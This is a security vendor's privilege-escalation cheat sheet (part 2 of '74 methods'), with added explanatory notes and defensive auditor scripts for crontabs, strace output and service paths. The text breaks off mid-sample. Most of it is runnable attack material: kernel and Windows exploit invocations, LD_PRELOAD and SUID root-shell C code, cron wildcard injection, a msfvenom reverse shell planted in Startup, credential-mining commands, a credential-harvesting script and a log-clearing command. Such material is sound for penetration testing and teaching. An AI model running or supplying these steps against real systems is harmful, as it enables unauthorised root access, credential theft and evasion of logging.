SAST | Audit Your Products: Identifying and helping to address hidden weaknesses in your Applications.
RASP | Protect Applications and APIs Anywhere: Identifying and helping to address hidden weaknesses in your organization's security.
Penetration Testing | PROTECTION PRO: Fully assess your organization's threat detection and response capabilities with a simulated cyber-attack.
Red Teaming Operation | PROTECTION PRO: Fully assess your organization's threat detection and response capabilities with a simulated cyber-attack.


HADESS
Secure Agile Development
WWW.HADESS.IO

74 METHODS FOR PRIVILEGE ESCALATION
PART 2


PART 1 SUMMARY

No  Method                                             Domain
 1  Abusing Sudo Binaries                              NO
 2  Abusing Scheduled Tasks                            Y/N
 3  Golden Ticket With Scheduled Tasks                 Yes
 4  Abusing Interpreter Capabilities                   NO
 5  Abusing Binary Capabilities                        NO
 6  Abusing ActiveSessions Capabilities                NO
 7  Escalate with TRUSTWORTHY in SQL Server            Y/N
 8  Abusing MySQL run as root                          Y/N
 9  Abusing journalctl                                 N
10  Abusing VDS                                        N
11  Abusing Browser                                    N
12  Abusing LDAP                                       YES
13  LLMNR Poisoning                                    YES
14  Abusing Certificate Services                       YES
15  MySQL UDF Code Injection                           Y/N
16  Impersonation Token with ImpersonateLoggedOnUser   YES
17  Impersonation Token with SeImpersonatePrivilege    YES
18  Impersonation Token with SeLoadDriverPrivilege     YES
19  OpenVPN Credentials                                NO
20  Bash History                                       NO
21  Packet Capture                                     Y/N
22  NFS Root Squashing                                 NO
23  Abusing Access Control List                        Y/N
24  Escalate With SeBackupPrivilege                    YES
25  Escalate With SeImpersonatePrivilege               YES
26  Escalate With SeLoadDriverPrivilege                YES
27  Escalate With ForceChangePassword                  YES
28  Escalate With GenericWrite                         YES
29  Abusing GPO                                        YES
30  Pass-the-Ticket                                    YES
31  Golden Ticket                                      YES
32  Abusing Splunk Universal Forwarder                 NO
33  Abusing Gdbus                                      Y/N
34  Abusing Trusted DC                                 YES
35  NTLM Relay                                         YES
36  Exchange Relay                                     YES
37  Dumping with diskshadow                            YES
38  Dumping with vssadmin                              YES
39  Password Spraying                                  Y/N
40  AS-REP Roasting                                    YES

(The "APT Used" column of the original summary is empty for every entry and is omitted here.)


PART 2

DIRTYC0W
Domain: No | Local Admin: Yes | OS: Linux | Type: 0/1 Exploit

gcc -pthread c0w.c -o c0w; ./c0w; passwd; id

CVE-2016-5195 (Dirty COW, kernels before late 2016). The c0w variant overwrites /usr/bin/passwd with a payload that gives a root shell, which is why passwd is run right after the exploit.


CVE-2016-1531
Domain: No | Local Admin: Yes | OS: Linux | Type: 0/1 Exploit

CVE-2016-1531.sh; id

Exim local root through perl_startup (Exim before 4.86.2 with Perl support); the script needs a setuid exim binary.


POLKIT
Domain: No | Local Admin: Yes | OS: Linux | Type: 0/1 Exploit

https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation
poc.sh

CVE-2021-3560 is a race in polkit's authorization check; the PoC may need several runs before the new sudo-capable user is created.


DIRTYPIPE
Domain: No | Local Admin: Yes | OS: Linux | Type: 0/1 Exploit

./traitor-amd64 --exploit kernel:CVE-2022-0847
whoami; id


PWNKIT
Domain: No | Local Admin: Yes | OS: Linux | Type: 0/1 Exploit

./cve-2021-4034
whoami; id


MS14_058
Domain: No | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit

msf > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set TARGET <target-id>
msf exploit(ms14_058_track_popup_menu) > exploit

This is a local module: it also needs an existing meterpreter session (set SESSION <id>) on the unpatched host.


HOT POTATO
Domain: No | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit

In a command prompt: powershell.exe -nop -ep bypass
In the PowerShell prompt: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
In the PowerShell prompt: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
To confirm that the attack was successful, in the PowerShell prompt: net localgroup administrators


INTEL SYSRET
Domain: No | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit

execute -H -f sysret.exe -a "-pid [pid]"      (from a meterpreter session; CVE-2012-0217, 64-bit kernels on Intel CPUs)


PRINTNIGHTMARE
Domain: Yes | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit

https://github.com/outflanknl/PrintNightmare
PrintNightmare 10.10.10.10 exp.dll


FOLLINA
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit

https://github.com/JohnHammond/msdt-follina
python3 follina.py -c "notepad"

CVE-2022-30190: the script produces a document that makes MSDT run the command; the target must open it.


ALPC
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit

https://github.com/riparino/Task_Scheduler_ALPC      (Task Scheduler ALPC local privilege escalation, CVE-2018-8440)


REMOTEPOTATO0
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit

sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user normal_user
.\RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1

The relay (first command) runs on the attacker's host; RemotePotato0 coerces the NTLM authentication of a privileged user logged on to the same box (session id given with -s) and forwards it to the relay.


CVE-2022-26923
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit

certipy req 'lab.local/cve$:CVEPassword1234*@10.100.10.13' -template Machine -dc-ip 10.10.10.10 -ca lab-ADCS-CA
Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show

The computer account cve$ must first be created with its dNSHostName set to the domain controller's name; the Machine template then issues a certificate that authenticates as the DC.


MS14-068
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit

python ms14-068.py -u <user>@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc

The script also takes -p <password> (or prompts for it); -s is the SID of the low-privileged user, and the forged PAC in the resulting ticket makes the unpatched DC treat that user as a Domain Admin.


PASSWORD MINING IN MEMORY (LINUX)
Domain: No | Local Admin: Yes | OS: Linux | Type: Enumeration & Hunt

ps -ef | grep ftp
gdb -p <ftp pid>
(gdb) info proc mappings
(gdb) dump memory /tmp/mem <start> <end>
(gdb) q
strings /tmp/mem | grep passw

Attaching needs ptrace rights on the process: same user with kernel.yama.ptrace_scope=0, or root.


PASSWORD MINING IN MEMORY (WINDOWS)
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt

1. In Metasploit (msf > prompt):
   use auxiliary/server/capture/http_basic
   set uripath x
   run
2. In taskmgr, right-click "iexplore.exe" in the "Image Name" column and select "Create Dump File" from the popup menu.
3. strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
   Copy the Base64 encoded string, then in a command prompt: echo -ne [Base64 String] | base64 -d
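The packet capture card and the two memory-dump cards all end in the same step: grep a text dump for credentials and decode what is encoded. The script below is an added example, not part of the Hadess deck: it reads such text (tcpdump -A output, strings of a process dump, a shell history) and reports URL-encoded password fields, FTP/POP3 PASS lines and HTTP Basic headers, decoding the Basic value. The sample dump, host and user names are constructed.

```bash
#!/usr/bin/env bash
# Added example, not part of the Hadess deck: pull credential-looking strings
# out of plaintext dumps. SAMPLE_DUMP is constructed.
# Real use:  tcpdump -nt -r capture.pcap -A 2>/dev/null | harvest_creds
#            strings iexplore.DMP | harvest_creds

# stdin: text. stdout: "<kind> <value>" per finding; kinds are basic, pass, form.
harvest_creds() {
    while IFS= read -r line; do
        case "$line" in
            *"Authorization: Basic "*)
                b64=${line#*Authorization: Basic }
                b64=${b64%%[[:space:]]*}
                printf 'basic %s\n' "$(printf '%s' "$b64" | base64 -d 2>/dev/null)" ;;
            *"PASS "*)
                printf 'pass %s\n' "${line#*PASS }" ;;
        esac
        # one line can carry several fields (a=1&pwd=2), so use grep -o
        printf '%s\n' "$line" |
        grep -oiE "(pwd|pass|password|passwd)=[^&\"'[:space:]]+" |
        while IFS= read -r kv; do printf 'form %s\n' "$kv"; done
    done
    return 0
}

# Constructed sample: an HTTP form login, a Basic header, an FTP login and a
# shell-history line.
SAMPLE_DUMP='POST /login HTTP/1.1
Host: intranet.local
user=alice&pwd=Summer2023!&remember=1
GET /admin HTTP/1.1
Authorization: Basic YWRtaW46UEBzc3cwcmQ=
USER backup
PASS backup123
echo "db_password=hunter2" >> .env'

printf '%s\n' "$SAMPLE_DUMP" | harvest_creds
```

The sample yields four findings: the form password, the decoded Basic credential admin:P@ssw0rd, the FTP password and the .env password. Anything the dump holds in cleartext is one grep away; that is the argument for not letting such dumps (or pcaps) sit on shared hosts.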


PASSWORD MINING IN REGISTRY
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt

1. reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUsername
2. reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
3. Note the autologon credentials from the output.
4. reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42 /v ProxyUsername
5. reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42 /v ProxyPassword
6. Note the proxy credentials from the output (BWP123F42 is a saved session name; list them with reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions).
7. reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v Password
8. reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v PasswordViewOnly
9. Take the encrypted values and run: C:\Users\User\Desktop\Tools\vncpwd\vncpwd.exe [Encrypted Password]
10. Note the decrypted credentials from the output (VNC stores passwords DES-encrypted with a fixed, publicly known key).

PASSWORD MINING IN GENERAL EVENTS VIA SEAUDIT
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt

./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics
flog -s 10s -n 200
Or
Import-Module LogCleaner.ps1

WELA summarises a saved Security.evtx by event ID. Passwords end up in the log when a user types one into the username field (failed-logon events) or when process command-line auditing records them in 4688 events.


PASSWORD MINING IN SECURITY EVENTS VIA SESECURITY
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt

./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics
flog -s 10s -n 200
Or
wevtutil cl Security      (clears the Security log; reading or clearing it requires SeSecurityPrivilege, and the clear itself is logged as event 1102)


STARTUP APPLICATIONS
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt

1. In Metasploit (msf > prompt):
   use multi/handler
   set payload windows/meterpreter/reverse_tcp
   set lhost [Kali VM IP Address]
   run
   In another terminal: msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe
2. Place x.exe in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup".

The all-users Startup folder must be writable by the current user (check with icacls); x.exe then runs with the privileges of whoever logs on next.


PASSWORD MINING IN MCAFEESITELISTFILES
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt

SharpUp.exe McAfeeSitelistFiles      (McAfee SiteList.xml files hold repository credentials encrypted with a known key)


PASSWORD MINING IN CACHEDGPPPASSWORD
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt

SharpUp.exe CachedGPPPassword      (locally cached Group Policy Preference files; cpassword values decrypt with the AES key Microsoft published)


PASSWORD MINING IN DOMAINGPPPASSWORD
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt

SharpUp.exe DomainGPPPassword      (same check against the Group Policy Preference files in SYSVOL)


PASSWORD MINING IN KEEPASS
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt

Seatbelt.exe keepass
Or
KeeTheft.exe


PASSWORD MINING IN WINDOWSVAULT
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt

Seatbelt.exe WindowsVault


PASSWORD MINING IN SECPACKAGECREDS
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt

Seatbelt.exe SecPackageCreds


PASSWORD MINING IN PUTTYHOSTKEYS
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt

Seatbelt.exe PuttyHostKeys      (reveals which SSH hosts the user has connected to, not passwords)


PASSWORD MINING IN RDCMANFILES
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt

Seatbelt.exe RDCManFiles      (Remote Desktop Connection Manager .rdg files with DPAPI-protected credentials)


PASSWORD MINING IN RDPSAVEDCONNECTIONS
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt

Seatbelt.exe RDPSavedConnections


PASSWORD MINING IN MASTERKEYS
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt

SharpDPAPI masterkeys      (decrypting a user's DPAPI master keys needs that user's password or the domain backup key; the decrypted keys unlock the DPAPI-protected secrets found by the other cards)


PASSWORD MINING IN BROWSERS
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt

SharpWeb.exe all


PASSWORD MINING IN FILES
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt

SauronEye.exe -d C:\Users\vincent\Desktop\ --filetypes .txt .doc .docx .xls --contents --keywords password pass* -v


PASSWORD MINING IN LDAP
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt

SharpLDAPSearch.exe "(&(objectClass=user)(cn=*svc*))" "samaccountname"
Or
Import-Module .\PowerView.ps1
Get-DomainComputer COMPUTER -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime

The second query reads the LAPS local administrator password; it only returns a value for principals granted read access to ms-Mcs-AdmPwd.


PASSWORD MINING IN CLIPBOARD
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt

execute-assembly /root/SharpClipHistory.exe


PASSWORD MINING IN GMSA PASSWORD
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt

GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT      (works from a principal listed in the gMSA's PrincipalsAllowedToRetrieveManagedPassword; prints the account's NTLM hash for use with Rubeus or pass-the-hash)


DELEGATE TOKENS VIA RDP
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Delegate tokens

./fake_rdp.py
Or
pyrdp-mitm.py 192.168.1.10 -k private_key.pem -c certificate.pem


DELEGATE TOKENS VIA FTP
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Delegate tokens

A fake FTP server built with the MockFtpServer library (imports added here; the deck listed only the body):

import org.mockftpserver.fake.FakeFtpServer;
import org.mockftpserver.fake.UserAccount;
import org.mockftpserver.fake.filesystem.DirectoryEntry;
import org.mockftpserver.fake.filesystem.FileEntry;
import org.mockftpserver.fake.filesystem.FileSystem;
import org.mockftpserver.fake.filesystem.WindowsFakeFileSystem;

FakeFtpServer fakeFtpServer = new FakeFtpServer();
fakeFtpServer.addUserAccount(new UserAccount("user", "password", "c:\\data"));
FileSystem fileSystem = new WindowsFakeFileSystem();
fileSystem.add(new DirectoryEntry("c:\\data"));
fileSystem.add(new FileEntry("c:\\data\\file1.txt", "abcdef 1234567890"));
fileSystem.add(new FileEntry("c:\\data\\run.exe"));
fakeFtpServer.setFileSystem(fileSystem);
fakeFtpServer.start();      // listens on port 21 unless setServerControlPort() is called first


FAKE LOGON SCREEN
Domain: No | Local Admin: Yes | OS: Windows | Type: Phish

execute-assembly fakelogonscreen.exe


ABUSING WINRM SERVICES
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Service

RogueWinRM.exe -p C:\windows\system32\cmd.exe

Works only when no real WinRM listener occupies port 5985: RogueWinRM binds it, triggers the BITS service to connect, and uses the resulting SYSTEM authentication with SeImpersonatePrivilege to launch the given program.


CERTIFICATE ABUSE
Domain: Yes | Local Admin: Yes | OS: Windows | Type: Abuse Certificate

Certify.exe request /ca:dc.domain.local\DC-CA /template:User…
Rubeus.exe asktgt /user:CORP\itadmin /certificate:C:\cert.pfx /password:password

The certificate must allow client authentication (the User template does); asktgt with /certificate performs PKINIT and returns a TGT for the certificate's subject.


SUDO LD_PRELOAD
Domain: No | Local Admin: Yes | OS: Linux | Type: Injection

Precondition: sudo -l shows env_keep+=LD_PRELOAD (so sudo passes the variable to the privileged command) and the user may run some binary (here apache2) as root.

1. ldreload.c:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

/* _init runs when the library is loaded, before the program's main */
void _init() {
    unsetenv("LD_PRELOAD");   /* do not re-inject into the shell we spawn */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
2. gcc -fPIC -shared -o /tmp/ldreload.so ldreload.c -nostartfiles
3. sudo LD_PRELOAD=/tmp/ldreload.so apache2
4. id

The deck's "LD_RELOAD=tmp/ldreload.so" was a typo: the variable is LD_PRELOAD and the path must be absolute.



ABUSING FILE PERMISSION VIA SUID BINARIES (.SO INJECTION)
Domain: No | Local Admin: Yes | OS: Linux | Type: Injection

Precondition: a setuid-root binary (here /usr/local/bin/suid-so) tries to load a shared library from a path the user can create. Find it with strace /usr/local/bin/suid-so 2>&1 | grep -iE 'open|access|no such file' and look for a missing .so under the home directory.

1. mkdir /home/user/.config
2. libcalc.c:
#include <stdio.h>
#include <stdlib.h>

/* constructor runs as soon as the library is mapped by the setuid process */
static void inject() __attribute__((constructor));

void inject() {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
3. gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
4. /usr/local/bin/suid-so
5. id

DLL INJECTION

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Injection
Difficulty:
APT Used:
Detection:

    1. RemoteDLLInjector64
       Or MemJect
       Or https://github.com/tomcarver16/BOF-DLL-Inject
    2. #define PROCESS_NAME "csgo.exe"
       Or RemoteDLLInjector64.exe pid C:\runforpriv.dll
       Or mandllinjection ./runforpriv.dll pid



EARLY BIRD INJECTION

Domain: No
Local Admin: Yes
OS: Windows
Type: Injection
Difficulty:
APT Used:
Detection:

    hollow svchost.exe pop.bin



PROCESS INJECTION THROUGH MEMORY SECTION

Domain: No
Local Admin: Yes
OS: Windows
Type: Injection
Difficulty:
APT Used:
Detection:

    sec-shinject PID /path/to/bin



ABUSING SCHEDULED TASKS VIA CRON PATH OVERWRITE

Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing Scheduled Tasks
Difficulty:
APT Used:
Detection:

    echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > systemupdate.sh
    chmod +x systemupdate.sh
    Wait a while
    /tmp/bash -p
    id && whoami



ABUSING SCHEDULED TASKS VIA CRON WILDCARDS

Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing Scheduled Tasks
Difficulty:
APT Used:
Detection:

    echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/systemupdate.sh
    touch /home/user/--checkpoint=1
    touch "/home/user/--checkpoint-action=exec=sh systemupdate.sh"
    Wait a while
    /tmp/bash -p
    id && whoami
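Both cron cards above come down to two things an administrator can read straight out of the crontab: a PATH that includes a directory users can write to (so an unqualified script name is resolved to the attacker's copy), and a command that expands a bare `*` inside a user-writable directory (so file names such as `--checkpoint-action=...` become arguments). The auditor below is an added example, not the document's own code; the crontab text is constructed, and the function takes the real `/etc/crontab` or `/etc/cron.d/*` content in the same format.

```python
"""Audit a system crontab for PATH-resolved commands and wildcard expansion.

Added example for this page; not the document's own code. The crontab below is
constructed. audit_crontab(text, system_crontab=True) expects the /etc/crontab
layout (schedule, user, command); pass system_crontab=False for per-user
crontab -l output, which has no user field.
"""
import os
import re
import shlex

USER_WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")
WILDCARD_SENSITIVE = {"tar", "rsync", "chown", "chmod", "7z", "zip"}
ASSIGNMENT_RE = re.compile(r'^([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*)$')


def untrusted_dir(d):
    """A relative or empty PATH entry, or one under a user-writable tree, is untrusted."""
    return (not d.startswith("/")) or (d.rstrip("/") + "/").startswith(USER_WRITABLE_PREFIXES)


def audit_command(lineno, command, path_dirs):
    out = []
    cwd = "/"
    untrusted_path = any(untrusted_dir(d) for d in path_dirs)
    for segment in re.split(r'&&|\|\||;|\|', command):
        try:
            argv = shlex.split(segment)
        except ValueError:            # unbalanced quotes: fall back to a whitespace split
            argv = segment.split()
        if not argv:
            continue
        prog = argv[0]
        if prog == "cd" and len(argv) > 1:
            cwd = argv[1]             # later segments of this job run in that directory
            continue
        if "/" not in prog and untrusted_path:
            out.append((lineno, f"'{prog}' is looked up through a PATH containing "
                                f"user-controllable entries"))
        if os.path.basename(prog) in WILDCARD_SENSITIVE and "*" in argv[1:]:
            out.append((lineno, f"'{prog}' expands a bare * in {cwd}; file names there "
                                f"become arguments (wildcard injection)"))
    return out


def audit_crontab(text, system_crontab=True):
    """Return (line_number, finding) pairs for the crontab text."""
    findings = []
    path_dirs = ["/usr/bin", "/bin"]           # cron's default PATH when none is set
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = ASSIGNMENT_RE.match(line)
        if m:
            if m.group(1) == "PATH":
                path_dirs = m.group(2).strip('"\'').split(":")
                bad = [d for d in path_dirs if untrusted_dir(d)]
                if bad:
                    findings.append((lineno, "PATH contains user-controllable entries: "
                                             + ", ".join(repr(d) for d in bad)))
            continue
        if line.startswith("@"):
            nfields = 2 if system_crontab else 1   # @reboot [user] command
        else:
            nfields = 6 if system_crontab else 5   # m h dom mon dow [user] command
        fields = line.split(None, nfields)
        if len(fields) <= nfields:
            continue
        findings.extend(audit_command(lineno, fields[nfields], path_dirs))
    return findings


# Constructed /etc/crontab; the directory and script names follow the cards above.
SAMPLE_CRONTAB = """\
# constructed /etc/crontab sample
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * *  root overwrite.sh
* * * * *  root /usr/local/bin/compress.sh
* * * * *  root cd /home/user && tar czf /tmp/backup.tar.gz *
"""

if __name__ == "__main__":
    for lineno, msg in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {lineno}: {msg}")
```

Note that once PATH is poisoned every unqualified command in the file is affected, including the distribution's own `run-parts` line. The remediation is the same for both findings: absolute paths for every command, a PATH limited to system directories, and no bare wildcards in directories that non-root users can write to (`tar` in particular should be given an explicit file list or `--` before the operands).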



ABUSING FILE PERMISSION VIA SUID BINARIES - (SYMLINK)

Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing File Permission
Difficulty:
APT Used:
Detection:

    1. su - www-data;
    2. nginxed-root.sh /var/log/nginx/error.log;
    3. As the root user:
       invoke-rc.d nginx rotate >/dev/null 2>&1






ABUSING FILE PERMISSION VIA SUID BINARIES - (ENVIRONMENT VARIABLES #1)

Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing File Permission
Difficulty:
APT Used:
Detection:

    1. cat > /tmp/service.c <<'EOF'
       #include <stdlib.h>
       #include <unistd.h>
       int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }
       EOF
    2. gcc /tmp/service.c -o /tmp/service;
    3. export PATH=/tmp:$PATH;
    4. /usr/local/bin/suid-env; id



ABUSING FILE PERMISSION VIA SUID BINARIES - (ENVIRONMENT VARIABLES #2)

Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing File Permission
Difficulty:
APT Used:
Detection:

    env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'
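The three SUID cards above (.so injection, environment variables #1 and #2) share one root cause: a privileged binary that reaches into places the calling user controls, either a library path under the user's home or a shell command resolved through PATH. A defender finds both by tracing the binary as root (the kernel ignores the setuid bit under ptrace for unprivileged tracers), for example `strace -f -e trace=execve,openat,stat,access /usr/local/bin/suid-so 2> trace.log`, and reading the trace. The parser below is an added example, not the document's own code; the trace lines are constructed, with binary and library names taken from the cards.

```python
"""Flag where a SUID binary reaches into user-controlled locations, from strace output.

Added example for this page; not the document's own code. The trace text below is
constructed; feed audit_strace() the stderr of a root-run strace of the binary.
"""
import re

WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")
SYSCALL_RE = re.compile(r'^(?:\[pid\s+\d+\]\s*)?(\w+)\((.*)\)\s*=\s*(-?\d+)(.*)$')
QUOTED_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
FILE_CALLS = {"execve", "open", "openat", "stat", "lstat", "access", "readlink"}


def audit_strace(text):
    """Return (line_number, finding) pairs for suspicious syscalls in strace output."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = SYSCALL_RE.match(line.strip())
        if not m:
            continue
        call, args, _ret, tail = m.groups()
        strings = QUOTED_RE.findall(args)
        if call not in FILE_CALLS or not strings:
            continue
        target = strings[0]        # for every call in FILE_CALLS the first quoted arg is the path
        if target.startswith(WRITABLE_PREFIXES):
            state = "absent, so a user could create it" if "ENOENT" in tail else "present"
            findings.append((lineno, f"{call} touches {target} ({state}) in a user-writable tree"))
        # execve("/bin/sh", ["sh", "-c", "<command>"], ...): how is <command> resolved?
        if call == "execve" and len(strings) >= 4 and strings[2] == "-c":
            words = strings[3].split()
            if words and "/" not in words[0]:
                findings.append((lineno, f"shell command '{words[0]}' is resolved through the "
                                         f"caller's PATH; use an absolute path or a fixed PATH"))
    return findings


# Constructed trace of the suid-so / suid-env binaries from the cards above.
SAMPLE_STRACE = """\
execve("/usr/local/bin/suid-so", ["/usr/local/bin/suid-so"], 0x7ffe3c2d1e40 /* 18 vars */) = 0
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/home/user/.config/libcalc.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
execve("/bin/sh", ["sh", "-c", "service apache2 start"], 0x7ffe3c2d1e40 /* 18 vars */) = 0
execve("/bin/sh", ["sh", "-c", "/usr/sbin/service apache2 start"], 0x7ffe3c2d1e40 /* 18 vars */) = 0
"""

if __name__ == "__main__":
    for lineno, msg in audit_strace(SAMPLE_STRACE):
        print(f"line {lineno}: {msg}")
```

The same two findings map to the fixes: a SUID program must not load libraries from user-owned paths (check its RPATH and any `dlopen` calls), and it must invoke helpers by absolute path with a sanitized environment, which is also why `bash -p` and modern shells drop SHELLOPTS/PS4 handling in privileged mode.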



DLL HIJACKING

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    1. windows_dll.c (payload command inside the DLL):
       cmd.exe /k net localgroup administrators user /add
    2. x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
    3. sc stop dllsvc & sc start dllsvc



ABUSING SERVICES VIA BINPATH

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    1. sc config daclsvc binpath= "net localgroup administrators user /add"
    2. sc start daclsvc



ABUSING SERVICES VIA UNQUOTED PATH

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    1. msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
    2. Place common.exe in 'C:\Program Files\Unquoted Path Service'.
    3. sc start unquotedsvc
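Why step 2 above works: when a service's BINARY_PATH_NAME contains spaces and is not quoted, the service control manager passes the string to CreateProcess, which tries each space-delimited prefix plus `.exe` before it reaches the real file. The check below, an added example that is not the document's own code, lists those candidate files for every service in `sc qc` output (each one must be in a directory only administrators can write to) and produces the quoted value for the fix. The `sc qc` text is constructed to match the card.

```python
"""Find unquoted service paths in `sc qc` output and derive the quoted fix.

Added example for this page; not the document's own code. SAMPLE_SC_QC is
constructed; in practice run `for /f "tokens=2" %s in ('sc query state^= all ^|
findstr SERVICE_NAME') do sc qc %s` and feed the combined output in.
"""
import re

SC_FIELD_RE = re.compile(r'^\s*([A-Z_]+)\s*:\s*(.*?)\s*$')
EXE_RE = re.compile(r'^(.*?\.exe)(?=\s|$)', re.IGNORECASE)


def unquoted_path_candidates(binary_path_name):
    """Executables CreateProcess would try before the intended one ([] when the path is safe)."""
    s = binary_path_name.strip()
    if not s or s.startswith('"'):
        return []
    m = EXE_RE.match(s)
    exe = m.group(1) if m else s          # anything after the .exe is the service's arguments
    if " " not in exe:
        return []
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def quoted_binpath(binary_path_name):
    """The remediation value: executable in quotes, arguments untouched."""
    s = binary_path_name.strip()
    if s.startswith('"'):
        return s
    m = EXE_RE.match(s)
    if not m:
        return f'"{s}"'
    exe = m.group(1)
    return f'"{exe}"' + s[len(exe):]


def parse_sc_qc(text):
    """Map SERVICE_NAME -> BINARY_PATH_NAME across one or more `sc qc` outputs."""
    services, current = {}, None
    for line in text.splitlines():
        m = SC_FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.groups()
        if key == "SERVICE_NAME":
            current = value
        elif key == "BINARY_PATH_NAME" and current:
            services[current] = value
    return services


def audit_services(text):
    """{service: [candidate paths]} for every service with an unquoted, space-containing path."""
    result = {}
    for name, path in parse_sc_qc(text).items():
        cands = unquoted_path_candidates(path)
        if cands:
            result[name] = cands
    return result


# Constructed `sc qc` output; the path mirrors the card above.
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

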